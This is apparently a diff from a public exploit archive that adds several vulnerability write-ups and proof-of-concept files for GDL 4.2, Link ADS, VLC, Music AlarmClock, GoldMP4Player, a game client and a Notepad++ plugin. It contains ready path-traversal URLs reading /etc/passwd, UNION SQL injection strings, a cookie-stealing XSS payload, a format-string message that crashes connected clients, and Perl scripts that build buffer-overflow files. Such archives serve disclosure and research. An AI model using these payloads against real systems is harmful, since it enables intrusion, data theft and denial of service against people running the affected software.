http://localhost/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://localhost/index.php?newtheme=../../../../../../../../../../etc/passwd%00
Line : gdl42/class/session.php 120 - 123 parameter : newtheme
$theme = $_COOKIE['gdl_theme'];
$newtheme = $_GET['newtheme'];
if (isset($newtheme)) {
if (file_exists("./theme/$newtheme/theme.php")) {
setcookie("gdl_theme",$newtheme,time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$newtheme;
} else {
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}
} elseif (isset($theme)) {
$gdl_content->theme=$theme;
}else{
setcookie("gdl_theme",$gdl_sys['theme'],time()+($gdl_sys['page_caching'] * 60));
$gdl_content->theme=$gdl_sys['theme'];
}
}
function login($userid,$password) {
global $gdl_auth,$gdl_sys;
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
#############################
#SQL Injection vulnerability#
#############################
http://localhost/download.php?id=injecthere
Line : gdl42/download.php 18 - 24 parameter : id
$file_id = $_GET['id'];
function download_redirect(){
global $file_id,$gdl_db,$gdl_metadata,$gdl_publisher,$gdl_session,$gdl_publisher2;
$dbres = $gdl_db->select("relation","part,path,identifier,uri","relation_id=$file_id");
$file_target=@mysql_result($dbres,0,"path");
$file_part=@mysql_result($dbres,0,"part");
$publisher = $gdl_metadata->get_publisher(@mysql_result($dbres,0,"identifier"));
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
###################################
#Blind SQL Injection vulnerability#
###################################
http://localhost/gdl.php?mod=browse&newlang=english&op=comment&page=read&id=injecthere
Line : gdl42/main.php 119 parameter : id
if ((file_exists("./theme/".$gdl_content->theme."/".$gdl_content->theme."_print.css"))&& ($_GET['mod']== "browse") && ($_GET['op']=="read") && (! empty ($_GET['id'])))
--------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
########################################
#Cross site scripting xss vulnerability#
########################################
http://localhost/gdl.php?mod=search&action=ByEge&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK
Line : module/search/function.php 38 parameter : keyword
###############################################################################################################################################################################
###############################################################################################################################################################################
Test Vulnerability :
http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2--
http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00
http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK

10
platforms/php/webapps/31963.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29923/info
Link ADS 1 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--
http://www.example.com/out.php?linkid=50+and+1=1 (true)
http://www.example.com/out.php?linkid=50+and+1=2 (false)

79
platforms/windows/dos/31899.txt Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: VLC 2.1.3 WriteAV Vulnerability, Decoders
# Date: 2014/02/20
# Exploit Author: kw4
# Software Link: http://www.videolan.org/vlc/index.html
# Version: 2.1.3
# Impact Med/High
# Tested on: Windows 7 64 bits
Memory corruption when VLC tries to load crafted .avs files.
(2b10.2750): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1a6fdbf8 ebx=15778b88 ecx=00000310 edx=1a2843c0 esi=1a284360
edi=00000311
eip=540716b4 esp=1b34fd50 ebp=00000480 iopl=0 nv up ei pl nz na po
nc
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x1a285000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Faulting Instruction:540716b4 fstp dword ptr [edx+ecx*4]
Exception Hash (Major/Minor): 0xf1ffd179.0x98f1d37c
Hash Usage : Stack Trace:
Major+Minor : libmpgatofixed32_plugin+0x16b4
Major+Minor : libvlccore!vlc_getProxyUrl+0x411
Major+Minor : libvlccore!aout_FiltersPlay+0x7a
Major+Minor : libvlccore!aout_CheckChannelExtraction+0x17f3
Major+Minor : libvlccore!input_Control+0x1431
Minor : libvlccore!input_Control+0x1708
Minor : libvlccore!input_Control+0x33c5
Minor : ntdll!RtlImageNtHeader+0x30e
Minor : libvlccore!vlc_threadvar_set+0x24
Minor : libvlccore!vlc_threadvar_delete+0x128
Minor : msvcrt!endthreadex+0x6c
Minor : kernel32!BaseThreadInitThunk+0x12
Excluded : ntdll!RtlInitializeExceptionChain+0x63
Excluded : ntdll!RtlInitializeExceptionChain+0x36
Instruction Address: 0x00000000540716b4
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Exploitable - User Mode Write AV starting at
libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c)
0:010> kd
176efd68 00000102
176efd6c 573a5f11 libvlccore!vlc_getProxyUrl+0x411
176efd70 00000001
176efd74 7efde000
176efd78 176efd98
176efd7c 1a1d2fc8
176efd80 1a1d2fd8
176efd84 00000001
176efd88 00000001
176efd8c 5737dcca libvlccore!aout_FiltersPlay+0x7a
176efd90 15a9cd44
176efd94 1a16ab88
176efd98 00000002
176efd9c 00000000
176efda0 00000000
176efda4 00002710
176efda8 00000000
176efdac 1a16ab88
176efdb0 000283e4
176efdb4 000003e8
Crafted avs file: http://www.exploit-db.com/sploits/31899.avs

30
platforms/windows/dos/31913.pl Executable file
View file

@ -0,0 +1,30 @@
#------------------------------------------------------------------------------------#
# Exploit Title: Music AlarmClock 2.1.0 (.m3u) Crash PoC #
# Date: Feb 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://download.cnet.com/Music-AlarmClock/3000-2350_4-10419263.html #
# Version: 2.1.0 #
# Tested on: Windows XP SP3 #
#------------------------------------------------------------------------------------#
# (a10.9e8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=7ffdd000 edx=41414161 esi=00153700 edi=0012df10
# eip=7c90100b esp=0012d5c8 ebp=0012d5d0 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
#!/usr/bin/perl
use strict;
use warnings;
my $filename = "poc.m3u";
my $junk = "A" x 10000;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE $junk;
close(FILE);
print "Exploit file created successfully [$filename]!\n";

46
platforms/windows/dos/31914.pl Executable file
View file

@ -0,0 +1,46 @@
?#---------------------------------------------------------------------------------#
# Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH) #
# Date: Feb 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html #
# Version: 3.3 #
# Tested on: Windows XP SP3 #
#---------------------------------------------------------------------------------#
# (cb4.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003
# eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1a0c3:
# 0041a0c3 8802 mov byte ptr [edx],al ds:0023:00130000=41
# 0:000> !exchain
# 0012e270: image00400000+4c1b3 (0044c1b3)
# 0012e3b0: image00400000+4c56a (0044c56a)
# 0012e430: image00400000+4c4ec (0044c4ec)
# 0012e4e0: *** ERROR: Symbol file could not be found.
# 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e8cc: image00400000+4c333 (0044c333)
# 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141)
# Invalid exception stack at 41414141
#!/usr/bin/perl
use strict;
use warnings;
my $filename = "poc.txt";
my $junk = "A" x 10000;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$junk.swf";
close(FILE);
print "Exploit file created successfully [$filename]!\n";
print "Now open the URL in $filename via File -> Open Flash URL\n";

9
platforms/windows/dos/31964.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29928/info
The '5th street' game is prone to a format-string vulnerability.
Exploiting this issue will allow attackers to execute arbitrary code with the privileges of a user running the application. Failed attacks will likely cause denial-of-service conditions.
When the following chat message is sent, the game client of every connected user will crash:
%5000000.x

33
platforms/windows/local/31895.txt Executable file
View file

@ -0,0 +1,33 @@
Application:Notepad++
Version:6.5.2 UNICODE
Get the application from: http://notepad-plus-plus.org/download/v6.5.2.html
Plugin:CCompletion
Version: Version 1.19 ( Unicode )
Get the plugin from: http://sourceforge.net/apps/mediawiki/notepad-plus/index.php?title=Plugin_Central
Vulnerability:Stack buffer overflow
Vulnerability Impact: Local Code Execution
Triggering details:
1. Install Notepad++ (6.5.2) with the plugin CCompletion(Version 1.19 UNICODE)
2. Open Notepad++
3. Input large number of characters (any character is ok), at least 554 characters.
4. Select all the text in the editor
5. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11, then the Notepad++ will be crashed
Cause of the Vulnerability
The notepad++ sends text the user selected to the plugin of CCompletion, but the plugin copys the text by using lstrcpyW in the module kernel32. So the stack buffer is over flow.
Exploit POC
I constructed an exploit for this vulnerability. It will show a message box with the caption “HA” and the text “Back Door Opend.”
1. This exploit does not process the mitigation of DEP, so if you want to test it please disable the DEP feature on your system or just for the application.
2. This exploit uses the “JMP ESP” insturction in module Notepad++.exe, because it is a non-ASLR module.So the expolit is independent of Windows system version.
The expolit is in the file attatchment named shellcode.txt
1? Open shellcode.txt with Notepad++
2? Select all the content in the editor
3? Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11
Exploit: http://www.exploit-db.com/sploits/31895.7z